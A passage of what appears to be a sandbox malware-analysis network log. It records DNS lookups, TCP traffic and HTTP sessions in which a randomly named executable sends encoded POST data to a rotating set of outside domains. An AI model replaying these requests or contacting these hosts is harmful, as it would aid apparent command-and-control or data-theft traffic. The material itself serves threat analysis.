                                                                          Nov 12, 2024 08:53:09.164997101 CET8049912209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:09.165052891 CET4991280192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:09.974369049 CET4991280192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:10.993257046 CET4992780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:10.998346090 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:10.998473883 CET4992780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:11.014210939 CET4992780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:11.019260883 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019279957 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019332886 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019391060 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019479990 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019490004 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019506931 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019515991 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019525051 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.954678059 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.993412971 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.993479013 CET4992780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:12.522173882 CET4992780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:13.539248943 CET4994380192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:13.544056892 CET8049943209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:13.544150114 CET4994380192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:13.557502031 CET4994380192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:13.562434912 CET8049943209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:14.226073980 CET8049943209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:14.264205933 CET8049943209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:14.266252995 CET4994380192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:14.270173073 CET4994380192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:14.274995089 CET8049943209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:19.591972113 CET4997980192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:19.596807003 CET804997947.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:19.596873045 CET4997980192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:19.608899117 CET4997980192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:19.614299059 CET804997947.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:20.562227964 CET804997947.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:20.646119118 CET4997980192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:20.748174906 CET804997947.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:20.748250008 CET4997980192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:21.116228104 CET4997980192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:22.138801098 CET4999480192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:22.143713951 CET804999447.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:22.143779039 CET4999480192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:22.155636072 CET4999480192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:22.160412073 CET804999447.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:23.126152992 CET804999447.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:23.223177910 CET4999480192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:23.318299055 CET804999447.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:23.318367958 CET4999480192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:23.661900997 CET4999480192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:24.680461884 CET5001080192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:24.685343981 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.685458899 CET5001080192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:24.696234941 CET5001080192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:24.701077938 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701137066 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701152086 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701226950 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701236010 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701298952 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701308012 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701348066 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701355934 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:25.927558899 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:25.927898884 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:25.927918911 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:25.927948952 CET5001080192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:25.927973986 CET5001080192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:26.208667994 CET5001080192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:27.227737904 CET5002380192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:27.232526064 CET805002347.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:27.232587099 CET5002380192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:27.242064953 CET5002380192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:27.246813059 CET805002347.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:28.208312035 CET805002347.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:28.258203983 CET5002380192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:28.394979000 CET805002347.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:28.402257919 CET5002380192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:28.403951883 CET5002380192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:28.408776045 CET805002347.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:33.489301920 CET5002480192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:33.494277954 CET8050024128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:33.494357109 CET5002480192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:33.626616955 CET5002480192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:33.631534100 CET8050024128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:35.146220922 CET5002480192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:35.149131060 CET8050024128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:35.149388075 CET5002480192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:35.151366949 CET8050024128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:35.151520014 CET5002480192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:36.167190075 CET5002580192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:36.172112942 CET8050025128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:36.172180891 CET5002580192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:36.188538074 CET5002580192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:36.193362951 CET8050025128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:37.693162918 CET5002580192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:37.698482990 CET8050025128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:37.698540926 CET5002580192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:38.712667942 CET5002680192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:38.718008995 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.718154907 CET5002680192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:38.728894949 CET5002680192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:38.733788013 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.733798027 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.733813047 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.733822107 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.733830929 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.733985901 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.733994961 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.734026909 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.734035969 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:40.240238905 CET5002680192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:40.408983946 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:40.409074068 CET5002680192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:41.260360956 CET5002780192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:41.617634058 CET8050027128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:41.617727041 CET5002780192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:41.626652002 CET5002780192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:41.631488085 CET8050027128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:43.107496977 CET8050027128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:43.161801100 CET5002780192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:43.199642897 CET8050027128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:43.202372074 CET5002780192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:43.206227064 CET5002780192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:43.211013079 CET8050027128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:48.308267117 CET5002880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:48.313476086 CET8050028217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:48.313656092 CET5002880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:48.325061083 CET5002880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:48.329874992 CET8050028217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:49.123608112 CET8050028217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:49.193082094 CET5002880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:49.231482029 CET8050028217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:49.231530905 CET5002880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:49.833853006 CET5002880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:50.852653027 CET5002980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:50.858489990 CET8050029217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:50.858589888 CET5002980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:50.869549036 CET5002980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:50.875266075 CET8050029217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:51.670789003 CET8050029217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:51.724320889 CET5002980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:51.779285908 CET8050029217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:51.779337883 CET5002980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:52.381350040 CET5002980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:53.401110888 CET5003080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:53.406008005 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.406096935 CET5003080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:53.420595884 CET5003080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:53.425472021 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425520897 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425585985 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425595045 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425616980 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425656080 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425697088 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425714016 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425724030 CET8050030217.70.184.50192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 12, 2024 08:52:08.126183033 CET | 192.168.2.4 | 1.1.1.1 | 0xe79e | Standard query (0) | www.corpseflowerwatch.org | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:52:23.853244066 CET | 192.168.2.4 | 1.1.1.1 | 0x2147 | Standard query (0) | www.4nk.education | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:52:37.618757963 CET | 192.168.2.4 | 1.1.1.1 | 0x4436 | Standard query (0) | www.migraine-massages.pro | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:52:52.133390903 CET | 192.168.2.4 | 1.1.1.1 | 0x3c | Standard query (0) | www.vnxoso88.art | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:53:05.884927988 CET | 192.168.2.4 | 1.1.1.1 | 0x6e7 | Standard query (0) | www.pluribiz.life | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:53:19.276222944 CET | 192.168.2.4 | 1.1.1.1 | 0x150b | Standard query (0) | www.kdtzhb.top | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:53:33.419606924 CET | 192.168.2.4 | 1.1.1.1 | 0x7d74 | Standard query (0) | www.evoo.website | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:53:48.212358952 CET | 192.168.2.4 | 1.1.1.1 | 0xb48f | Standard query (0) | www.astorg-group.info | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:54:01.915544033 CET | 192.168.2.4 | 1.1.1.1 | 0x1ba5 | Standard query (0) | www.fiqsth.vip | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:54:15.322459936 CET | 192.168.2.4 | 1.1.1.1 | 0xfd91 | Standard query (0) | www.bio-thymus.com | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:54:29.575325012 CET | 192.168.2.4 | 1.1.1.1 | 0xfaa6 | Standard query (0) | www.wukong.college | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:54:44.103538036 CET | 192.168.2.4 | 1.1.1.1 | 0x7650 | Standard query (0) | www.vehiculargustav.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 12, 2024 08:52:08.150079966 CET | 1.1.1.1 | 192.168.2.4 | 0xe79e | No error (0) | www.corpseflowerwatch.org | corpseflowerwatch.org | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 08:52:08.150079966 CET | 1.1.1.1 | 192.168.2.4 | 0xe79e | No error (0) | corpseflowerwatch.org | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:52:08.150079966 CET | 1.1.1.1 | 192.168.2.4 | 0xe79e | No error (0) | corpseflowerwatch.org | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:52:23.914774895 CET | 1.1.1.1 | 192.168.2.4 | 0x2147 | No error (0) | www.4nk.education | webredir.vip.gandi.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 08:52:23.914774895 CET | 1.1.1.1 | 192.168.2.4 | 0x2147 | No error (0) | webredir.vip.gandi.net | | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:52:37.856441021 CET | 1.1.1.1 | 192.168.2.4 | 0x4436 | No error (0) | www.migraine-massages.pro | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:52:52.571801901 CET | 1.1.1.1 | 192.168.2.4 | 0x3c | No error (0) | www.vnxoso88.art | 77980.bodis.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 08:52:52.571801901 CET | 1.1.1.1 | 192.168.2.4 | 0x3c | No error (0) | 77980.bodis.com | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:53:05.902237892 CET | 1.1.1.1 | 192.168.2.4 | 0x6e7 | No error (0) | www.pluribiz.life | | 209.74.64.58 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:53:19.589313984 CET | 1.1.1.1 | 192.168.2.4 | 0x150b | No error (0) | www.kdtzhb.top | | 47.242.89.146 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:53:33.466208935 CET | 1.1.1.1 | 192.168.2.4 | 0x7d74 | No error (0) | www.evoo.website | | 128.65.195.180 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:53:48.302865982 CET | 1.1.1.1 | 192.168.2.4 | 0xb48f | No error (0) | www.astorg-group.info | webredir.vip.gandi.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 08:53:48.302865982 CET | 1.1.1.1 | 192.168.2.4 | 0xb48f | No error (0) | webredir.vip.gandi.net | | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:54:01.929088116 CET | 1.1.1.1 | 192.168.2.4 | 0x1ba5 | No error (0) | www.fiqsth.vip | fiqsth.vip | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 08:54:01.929088116 CET | 1.1.1.1 | 192.168.2.4 | 0x1ba5 | No error (0) | fiqsth.vip | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:54:01.929088116 CET | 1.1.1.1 | 192.168.2.4 | 0x1ba5 | No error (0) | fiqsth.vip | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:54:15.335649014 CET | 1.1.1.1 | 192.168.2.4 | 0xfd91 | No error (0) | www.bio-thymus.com | bio-thymus.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 08:54:15.335649014 CET | 1.1.1.1 | 192.168.2.4 | 0xfd91 | No error (0) | bio-thymus.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:54:15.335649014 CET | 1.1.1.1 | 192.168.2.4 | 0xfd91 | No error (0) | bio-thymus.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:54:30.254235029 CET | 1.1.1.1 | 192.168.2.4 | 0xfaa6 | No error (0) | www.wukong.college | | 47.52.221.8 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 08:54:44.381175995 CET | 1.1.1.1 | 192.168.2.4 | 0x7650 | No error (0) | www.vehiculargustav.click | ppp84k45ss7ehy8ypic5x.limelightcdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 08:54:44.381175995 CET | 1.1.1.1 | 192.168.2.4 | 0x7650 | No error (0) | ppp84k45ss7ehy8ypic5x.limelightcdn.com | | 23.106.59.18 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 3.33.130.190 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:52:08.170483112 CET | 381 | OUT | GET /yjfe/?L2m0Zn=ssLl/70GAhUcKdDjElf9oY7c1Toe/LKZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYqz93E4YYiGwwRQuF1AOSzaR72LbFn096Vw=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.corpseflowerwatch.org
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 12, 2024 08:52:08.804238081 CET | 400 | IN | HTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Tue, 12 Nov 2024 07:52:08 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 260
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?L2m0Zn=ssLl/70GAhUcKdDjElf9oY7c1Toe/LKZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYqz93E4YYiGwwRQuF1AOSzaR72LbFn096Vw=&JPc=NBQdBBkPWTStX"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 217.70.184.50 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:52:23.933362007 CET | 634 | OUT | POST /gnvu/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.4nk.education
                                                                          Origin: http://www.4nk.education
                                                                          Referer: http://www.4nk.education/gnvu/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Ascii: L2m0Zn=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTVTlP4Co3+sSF9X57wAlNDqM7fcIP+WMUg==
Nov 12, 2024 08:52:24.748008966 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:52:24 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 217.70.184.50 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:52:26.546372890 CET | 654 | OUT | POST /gnvu/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.4nk.education
                                                                          Origin: http://www.4nk.education
                                                                          Referer: http://www.4nk.education/gnvu/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Ascii: L2m0Zn=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcB3K8Nik+Kq4bCLHsJho9DFmC0HGrTZqBsLAS3dOw2Yr+27YwoG/qSJS9HUtodlSVjXQiMkBCia52v+Ft/v9V+wlcGd/hgQ2Mep6unEy6D7L9ofK++CmfUg+cUquIeWc2tweE7ajqBhyfDO/mYV8C9rFPmTf6fynEP1qymn27F0I0Rk=
Nov 12, 2024 08:52:27.325246096 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:52:27 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 217.70.184.50 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:52:29.139610052 CET | 10736 | OUT | POST /gnvu/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.4nk.education
                                                                          Origin: http://www.4nk.education
                                                                          Referer: http://www.4nk.education/gnvu/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Ascii: L2m0Zn=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcAjK7/akvbq4YCLHyZhp9DFnCyuPrTl6BqPADiBOnUwrnG7Yt4G+kyJL9Hkhod1SVjXQiKABVja5l/+Gq/v5EuxwcG0KhgcMMuJ6r3Uy3RDL8IfU/+C+fTp5cU2EIeLJ2qYeGN7IwzkkDVWjzKZ/P9nfB1vI/uucfr9cpmOqlQo+p281UMSv4MftEKZHd/GLPDP6cN/GfxzpIXGFe51x+HVucsCtmQt4qxb5cYSlTTFZcanNxn909rP9AMF7msVZpJfVzwlYq7TMX0hmQ11wuMWGCAG430pa6slmttIKNyZVPJMT7N7Ju4DPDorEG2DHWmKG7g0FzfVqP+rR13u3BiLWDa19ZQTPiDkU7HjiPUXGfcDRyazkv9ZgNRLR0yClP/PnyrJWNJcPrvnbhJ+XQLlf03vn+CSCZIIn3meV+Aga+0tL10hkkeai5+syQky+ptkMz5jdzUo7vOn2x2IxMWrFMf9hF1R6UbKuH0oJr3JVsIu7fy1i3Ahx8HUSuB1QGoofu5eNlC9DcR5F9vKDYHfVuFQqosyzYwqj15X1nF855OocQ4VxrIFY/CWF2aeU1RlzFId5It6z76OE4rY0g/WVdISn8mensnUECQuuxFvf0dD5QhaXg4V1BF+ZAxbA2X3Eqjn6pTPTf4M0ZFh2JBTKxdH0T2j3PVXfLFwVWCIK2qNeLjTKvb4/lUNxWd6LOCpAdtc6VjH+n//saYQYf1Qrneu7SfBikl/tcOxaBWELD30nZua942fm5ASNI6sgW3V7EwFn+n4Vm6swYZeE/fZ8NCI1QV/PHNUq0tTz0dpOV+ipRVWecNz3sD50d7a3RrY9X7KN0KY3d2bRaG8AkU/Y/y34CPwtw0cYgFU0SLziVrv5IC/YBmCfak3eeNZzCyo3FzdKDiepvJrPX63d/32LItcy3RGNgfDkgOY3ySsyymGSrW3wSmBJvnLsSlZeRM/Td [TRUNCATED]
Nov 12, 2024 08:52:29.984438896 CET | 713 | IN | HTTP/1.1 502 Bad Gateway
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:52:29 GMT
                                                                          Content-Type: text/html
